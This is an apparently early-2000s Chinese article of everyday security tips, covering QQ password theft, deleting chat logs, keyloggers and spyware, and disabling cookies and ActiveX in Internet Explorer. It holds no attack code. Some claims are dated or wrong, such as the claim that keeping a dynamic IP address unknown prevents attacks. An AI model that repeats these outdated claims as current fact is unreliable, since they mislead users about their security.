你不但要防范來(lái)自網(wǎng)上的危險(xiǎn),,你更要防范來(lái)自現(xiàn)實(shí)中的竊密者。在更多的情況下,,你周圍的人才是真正最危險(xiǎn)的人?,F(xiàn)在很多人都用QQ來(lái)聊天,也正是QQ成為泄露你秘密的主要渠道,。針對(duì)QQ的竊密工具很多,,可以偷竊密碼、偷看聊天記錄等,,簡(jiǎn)直讓人防不勝防,。 解決方案:如果是網(wǎng)吧等公共場(chǎng)所使用QQ,,聊天后最好把聊天記錄刪除。刪除聊天記錄主要有兩種辦法,,如果你對(duì)電腦不太熟悉,,可以點(diǎn)擊QQ的“消息管理”,在彈出的“消息管理器”窗口中用右鍵點(diǎn)擊你的號(hào)碼(在左上角),,然后點(diǎn)“刪除消息”,,就可以刪除全部聊天記錄,如果你覺(jué)得這些聊天記錄對(duì)你很重要想要保存它,,你可以在“消息管理”中,,用右鍵點(diǎn)擊自己的號(hào)碼,再點(diǎn)擊“導(dǎo)出聊天記錄為文本文件”,,把它們備份到軟盤上或發(fā)到自己的郵箱保存后再刪除硬盤上的聊天記錄,。有一定電腦使用經(jīng)驗(yàn)的用戶,可以采取第二種方法:到QQ所在的安裝目錄C:\Program Files\Tencent,,刪除以你自己的QQ號(hào)碼命名的文件夾,,別忘了還要清空回收站哦!從硬盤上刪除該文件夾比第一種辦法好,,因?yàn)槌藙h除聊天記錄外,,還可在“一定程度上”防止他人用破解QQ密碼的工具從這個(gè)文件夾中偷竊你的密碼,請(qǐng)注意只是“在一定程度上”,,因?yàn)檫€可以通過(guò)其他途徑來(lái)偷竊密碼,。 在公共場(chǎng)所上網(wǎng),要小心QQ號(hào)碼被盜,,可QQ號(hào)碼被盜的現(xiàn)象依然不斷,。 解決方案:要防止QQ的密碼被盜,還應(yīng)注意幾點(diǎn):應(yīng)盡快將QQ升級(jí)到更安全更完善的最新版本,。此外最好不要以生日,、 名字、電話號(hào)碼等個(gè)人信息來(lái)作為密碼,,密碼要復(fù)雜,,不定期更換,當(dāng)然也要方便你記憶,。最好是數(shù)字加英文加標(biāo)點(diǎn)符號(hào),,8∽16位最合適。如果你的密碼長(zhǎng)度很短或者太簡(jiǎn)單的時(shí)候,,就容易被QQ密碼猜解器在短時(shí)間內(nèi)猜解出來(lái),。設(shè)置完密碼后可以到騰訊網(wǎng)站申請(qǐng)密碼保護(hù)功能,被盜后方便取回密碼,。 如今網(wǎng)上流傳一些QQ密碼竊取軟件,,運(yùn)行它之后,在你輸入密碼登錄QQ的同時(shí)記錄密碼到某個(gè)文件中,,對(duì)這類軟件很難防范,,你不僅僅要注意QQ的密碼被盜,你的其他密碼也要小心被盜,。很多人為了圖省事,,電子郵件和QQ是同一密碼,但這樣做存在嚴(yán)重的安全隱患,,因?yàn)橐坏┮粋€(gè)密碼被竊,,就全線失守了。要完全防范別人偷你的密碼,,真的很不容易,。最可怕的是一些在后臺(tái)秘密監(jiān)視計(jì)算機(jī)活動(dòng)的軟件,這些監(jiān)視軟件可以記錄你使用電腦的所有過(guò)程,,包括你的所有鍵盤鍵入,,當(dāng)然你的密碼也都通通被記錄(包括QQ密碼、E-mail密碼在內(nèi)的所有密碼全都暴露無(wú)遺),。要發(fā)現(xiàn)這類軟件的蹤跡很難,,這類程序運(yùn)行時(shí),按“Ctrl+Alt+Del”也無(wú)法看到,,反病毒軟件也不監(jiān)控這類軟件,。目前沒(méi)有很好的辦法來(lái)發(fā)現(xiàn)這類監(jiān)視軟件。 解決方案:到控制面板中的“添加/刪除程序”屬性中,,看看里面有沒(méi)有什么可疑的程序,;另外就是從“開始”菜單中的“運(yùn)行”中鍵入“msconfig”,在打開的“系統(tǒng)配置程序”之“啟動(dòng)”項(xiàng)中,,查查有沒(méi)有可疑的啟動(dòng)項(xiàng),。但是這些辦法,都很不可靠,。要比較徹底發(fā)現(xiàn)這類程序,,可以使用winkill之類的內(nèi)存駐留監(jiān)控程序來(lái)監(jiān)測(cè)有沒(méi)有異常的情況,但是使用winkill來(lái)發(fā)現(xiàn)這類軟件要求對(duì)計(jì)算機(jī)比較熟悉,,使用起來(lái)也不方便,,而且winkill只能發(fā)現(xiàn)可疑者而不能判斷它究竟是不是“監(jiān)視軟件”。要防范這類程序真的很難,,讓你防不勝防,,稍不注意你的秘密就全被暴露。你還有秘密嗎,?其實(shí)你已經(jīng)沒(méi)有了…… 推薦]網(wǎng)上信息安全的防范技巧十三法 二十世紀(jì)九十年代末出現(xiàn)的INTERNET標(biāo)志著人類社會(huì)已經(jīng)進(jìn)入了信息化時(shí)代,在這個(gè)時(shí)代,,越來(lái)越多的人已經(jīng)開始離不開Internet網(wǎng)絡(luò),。然而在現(xiàn)有的Internet的環(huán)境中,君子風(fēng)度和信任感已經(jīng)所剩無(wú)幾了。社會(huì)上能找到的所有的兇險(xiǎn), 卑鄙和投機(jī), Internet上應(yīng)有盡有,。從Internet誕生之日起, 特別是自90年代它向公眾開放以來(lái), 它已經(jīng)成為眾矢之的,。尤其是在一些電子商務(wù)網(wǎng)站進(jìn)行購(gòu)物,或者希望注冊(cè)成為某些網(wǎng)站的會(huì)員的時(shí)候,,我們要特別注意保護(hù)自己個(gè)人信息在網(wǎng)上的安全,。這是因?yàn)槲覀兺ㄟ^(guò)表格來(lái)注冊(cè)和提交個(gè)人信息時(shí),程序會(huì)把這些信息打包發(fā)送到目的地,,在傳送到目的地的過(guò)程中需要經(jīng)過(guò)一系列的網(wǎng)站中轉(zhuǎn),,當(dāng)然被傳送的信息就很容易在所經(jīng)過(guò)的網(wǎng)路上留下自己的蹤跡,如果這些蛛絲馬跡不幸被某些別有用心的人截獲并加以利用,,麻煩可就大了--雖然這種幾率比較低,,但面對(duì)如今一無(wú)法規(guī)二無(wú)規(guī)則、尚顯無(wú)序的網(wǎng)絡(luò),,總應(yīng)該多加小心,。下面,筆者就為各個(gè)用戶提供一些保護(hù)網(wǎng)上信息安全的方法措施,,希望能夠?qū)Ω魑挥脩簟? 1,、不輕易運(yùn)行不明真相的程序 如果你收到一封帶有附件的電子郵件,且附件是擴(kuò)展名為EXE一類的文件,,這時(shí)千萬(wàn)不能貿(mào)然運(yùn)行它,,因?yàn)檫@個(gè)不明真相的程序,就有可能是一個(gè)系統(tǒng)破壞程序,。攻擊者常把系統(tǒng)破壞程序換一個(gè)名字用電子郵件發(fā)給你,,并帶有一些欺騙性主題,騙你說(shuō)一些:“這是個(gè)好東東,,你一定要試試”,,“幫我測(cè)試一下程序”之類的話。你一定要警惕了,!對(duì)待這些表面上很友好,、跟善意的郵件附件,我們應(yīng)該做的是立即刪除這些來(lái)歷不明的文件,。 2,、屏蔽小甜餅信息 小甜餅就是Cookie,它是Web服務(wù)器發(fā)送到電腦里的數(shù)據(jù)文件,,它記錄了諸如用戶名,、口令和關(guān)于用戶興趣取向的信息。實(shí)際上,,它使你訪問(wèn)同一站點(diǎn)時(shí)感到方便,,比如,,不用重新輸入口令。但Cookies收集到的個(gè)人信息可能會(huì)被一些喜歡搞“惡作劇”的人利用,,它可能造成安全隱患,,因此,我們可以在瀏覽器中做一些必要的設(shè)置,,要求瀏覽器在接受Cookie之前提醒您,或者干脆拒絕它們,。通常來(lái)說(shuō),,Cookie會(huì)在瀏覽器被關(guān)閉時(shí)自動(dòng)從計(jì)算機(jī)中刪除,可是,,有許多Cookie會(huì)一反常態(tài),,始終存儲(chǔ)在硬盤中收集用戶的相關(guān)信息,其實(shí)這些Cookie就是被設(shè)計(jì)成能夠駐留在我們的計(jì)算機(jī)上的,。隨著時(shí)間的推移,,Cookie信息可能越來(lái)越多,當(dāng)然我們的心境也因此變得越來(lái)越不踏實(shí),。為了確保萬(wàn)無(wú)一失,,對(duì)待這些已有的Cookie信息應(yīng)該從硬盤中立即清除,并在瀏覽器中調(diào)整Cookie設(shè)置,,讓瀏覽器拒絕接受Cookie信息,。屏蔽Cookie的操作步驟為:首先用鼠標(biāo)單擊菜單欄中的“工具”菜單項(xiàng),并從下拉菜單中選擇“Internet選項(xiàng)”,;接著在選項(xiàng)設(shè)置框中選中“安全”標(biāo)簽,,并單擊標(biāo)簽中的“自定義級(jí)別”按鈕;同時(shí)在打開的“安全設(shè)置”對(duì)話框中找到關(guān)于Cookie的設(shè)置,,然后選擇“禁用”或“提示”,。 3、不同的地方用不同的口令 對(duì)于經(jīng)常上網(wǎng)的用戶,,可能會(huì)發(fā)現(xiàn)在網(wǎng)上需要設(shè)置密碼的情況有很多,。有很多用戶圖方便記憶,不論在什么地方,,都使用同一個(gè)口令,,殊不知他們已不知不覺(jué)地留下了一個(gè)安全隱患。因?yàn)楣粽咭话阍谄偏@到用戶的一個(gè)密碼后,,會(huì)用這個(gè)密碼去嘗試用戶每一個(gè)需要甬道口令的地方,!想想看,別人用一個(gè)口令慢慢地盜用你的賬號(hào)上網(wǎng),;再去偷看與冒發(fā)你的E-mail,;也許還會(huì)用你的身份去聊天室損害你的形象,;還有.....,想想看那后果該有多嚴(yán)重呀,!所以筆者強(qiáng)烈建議各位用戶,,每個(gè)不同的地方用不同的密碼,一定不能不同,,同時(shí)要把各個(gè)對(duì)應(yīng)的密碼記下來(lái),,以備日后查用。另外一點(diǎn)就是我們?cè)谠O(shè)定密碼時(shí),,不應(yīng)該使用字典中可以查到的單詞,,也不要使用個(gè)人的生日,最好是字母,、符號(hào)和數(shù)字混用,,多用特殊字符,諸如%,、&,、#、和$,并且在允許的范圍內(nèi),,越長(zhǎng)越好,,以保證你的密碼不易被人猜中。 4,、 屏蔽ActiveX控件 由于ActiveX控件可以被嵌入到HTML頁(yè)面中,,并下載到瀏覽器端加以執(zhí)行,因此會(huì)給瀏覽器端造成一定程度的安全威脅,。目前已有證據(jù)表明,,在客戶端的瀏覽器中,如IE中插入某些ActiveX控件,,也將直接對(duì)服務(wù)器端造成意想不到的安全威脅,。同時(shí),一些其他技術(shù),,如內(nèi)嵌于IE的VB Script語(yǔ)言,,用這種語(yǔ)言生成的客戶端可執(zhí)行的程序模塊,也同 Java小程序一樣,,有可能給客戶端帶來(lái)安全性能上的漏洞,。此外,還有一些新技術(shù),,如ASP(Active serv er Pages)技術(shù),,由于用戶可以為ASP的輸出隨意增加客戶腳本、ActiveX控件和動(dòng)態(tài)HTML,因此在ASP腳本中同樣也都存在著一定的安全隱患,。所以,,用戶如果要保證自己在因特網(wǎng)上的信息絕對(duì)安全,可以屏蔽掉這些可能對(duì)計(jì)算機(jī)安全構(gòu)成威脅的ActiveX控件,,具體操作步驟為:首先用鼠標(biāo)單擊菜單欄中的“工具”菜單項(xiàng),,并從下拉菜單中選擇“Internet選項(xiàng)”;接著在選項(xiàng)設(shè)置框中選中“安全”標(biāo)簽,,并單擊標(biāo)簽中的“自定義級(jí)別”按鈕,;同時(shí)在打開的“安全設(shè)置”對(duì)話框中找到關(guān)于ActiveX控件的設(shè)置,然后選擇“禁用”或“提示”,。 5,、定期清除緩存、歷史記錄以及臨時(shí)文件夾中的內(nèi)容 我們?cè)谏暇W(wǎng)瀏覽信息時(shí),,瀏覽器會(huì)把我們?cè)谏暇W(wǎng)過(guò)程中瀏覽的信息保存在瀏覽器的相關(guān)設(shè)置中,這樣下次再訪問(wèn)同樣信息時(shí)可以很快地達(dá)到目的地,,從而提高了我們的瀏覽效率,。但是瀏覽器的緩存、歷史記錄以及臨時(shí)文件夾中的內(nèi)容保留了我們太多的上網(wǎng)的記錄,,這些記錄一旦被那些無(wú)聊的人得到,,他們就有可能從這些記錄中尋找到有關(guān)個(gè)人信息的蛛絲馬跡。為了確保個(gè)人信息資料的絕對(duì)安全,,我們應(yīng)該定期清理緩存,、歷史記錄以及臨時(shí)文件夾中的內(nèi)容。清理瀏覽器緩存并不麻煩,,具體的操作方法如下:首先用鼠標(biāo)單擊菜單欄中的“工具”菜單項(xiàng),,并從下拉菜單中選擇“Internet選項(xiàng)”;接著在選項(xiàng)設(shè)置框中選中“常規(guī)”標(biāo)簽,,并單擊標(biāo)簽中的“刪除文件”按鈕來(lái)刪除瀏覽器中的臨時(shí)文件夾中的內(nèi)容,;然后在同樣的餓對(duì)話框中單擊“清除歷史記錄”按鈕來(lái)刪除瀏覽器中的歷史記錄和緩存中的內(nèi)容。 6,、不隨意透露任何個(gè)人信息 在網(wǎng)上瀏覽信息時(shí),,經(jīng)常會(huì)發(fā)現(xiàn)需要用戶注冊(cè)自己個(gè)人信息資料的表單。這些站點(diǎn)通過(guò)程序設(shè)計(jì)達(dá)到一種不填寫表單就不能獲取自己需要的信息的目的,。面對(duì)這種強(qiáng)迫用戶注冊(cè)個(gè)人信息的情況,,我們最好的辦法是不要輕易把自己真實(shí)的信息提交給他們,特別是不要向任何人透露你的密碼,。還有,,在使用ICQ、OICQ等網(wǎng)絡(luò)軟件以及注冊(cè)免費(fèi)E-mail信息的時(shí)候,我們都需要填寫一些個(gè)人資料,。某些資料是必須填寫的,,自然無(wú)法略過(guò)。但是對(duì)于可填可不填但又涉及自己隱私的資料,,還是能免就免,,您有權(quán)利保持沉默,否則您所說(shuō)的一切,,有可能在網(wǎng)絡(luò)上被黑客利用,。這一沉默原則同樣適用于聊天室,在弄清楚聊天室的環(huán)境和各個(gè)人物之前,,使用虛擬的網(wǎng)名應(yīng)該是明智的選擇,。你應(yīng)該注意你常去的地方是不是把你的IP地址顯示了出來(lái),特別是在一些聊天室里,,你一定要小心了,!可能攻擊你的人就是這樣才能控制你的。因?yàn)槲覀儞芴?hào)上網(wǎng)的用戶IP是動(dòng)態(tài)的,,你每次上網(wǎng)的IP是服務(wù)器隨機(jī)分配給你的,,所以自己的IP如果不讓人知道,是不會(huì)遭到襲擊的,。 7,、突遇莫名其妙的故障時(shí)要及時(shí)檢查系統(tǒng)信息 上網(wǎng)過(guò)程中,突然覺(jué)得計(jì)算機(jī)工作不對(duì)勁時(shí),,仿佛感覺(jué)有人在遙遠(yuǎn)的地方遙控你,。這時(shí),你必須及時(shí)停止手中的工作,,立即按Ctrl+Alt+Del復(fù)合鍵來(lái)查看一下系統(tǒng)是否運(yùn)行了什么其他的程序,,一旦發(fā)現(xiàn)有莫名其妙的程序在運(yùn)行,你馬上停止它,,以免對(duì)整個(gè)計(jì)算機(jī)系統(tǒng)有更大的威脅,。但是并不是所有的程序運(yùn)行時(shí)出現(xiàn)在程序列表中,有些程序例如Back Orifice(一種黑客的后門程序)并不顯示在Ctrl+Alt+Del復(fù)合鍵的進(jìn)程列表中,,所以如果你的計(jì)算機(jī)中運(yùn)行的是WIN98或者WIN2000操作系統(tǒng),,最好運(yùn)行“附件”/“系統(tǒng)工具”/“系統(tǒng)信息”,然后雙擊“軟件環(huán)境”,,選擇“正在運(yùn)行任務(wù)”,,在任務(wù)列表中尋找自己不熟悉的或者自己并沒(méi)有運(yùn)行的程序,一旦找到程序后應(yīng)立即終止它,,以防后患 |
|
|
來(lái)自: haroo > 《電腦網(wǎng)絡(luò)》
